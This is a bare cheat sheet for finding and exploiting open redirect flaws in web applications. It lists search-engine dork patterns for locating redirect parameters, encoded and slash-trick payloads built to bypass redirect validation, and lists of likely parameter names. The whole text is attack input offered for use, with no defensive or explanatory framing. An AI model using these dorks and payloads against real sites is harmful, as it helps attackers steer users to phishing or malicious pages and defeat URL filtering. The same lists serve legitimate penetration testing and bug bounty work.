
Google Dorks for 'URL Redirection'
==================================
?next=
?url=
?target=
?rurl=
?dest=
?destination=
?redir=
redirect_uri=
?redirect_url=
?redirect=
/redirect/
cgi-bin/redirect.cgi?{}
/out/
/out?
?view=
/login?to=
?image_url=
?go=
?return=
?returnTo=
?return_to=
?checkout_url=

Open Redirection Payloads
=========================
//#//google.com/
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//;@google.com
//%09/google.com
//%http://5cgoogle.com
//google.com/..;/css
//\http://google.com
//%EF%B9%B0/https://google.com


Common Parameter List For 'URL Redirection'
===========================================
dest
redirect
rurl
val
uri
path
validate
domain
continue
url
callback
return
window
to
page
feed
out
host
port
next
view
dir
data
show
navigation
reference
site
html
Open
url
file

Short Hand Params
================
r=
u=





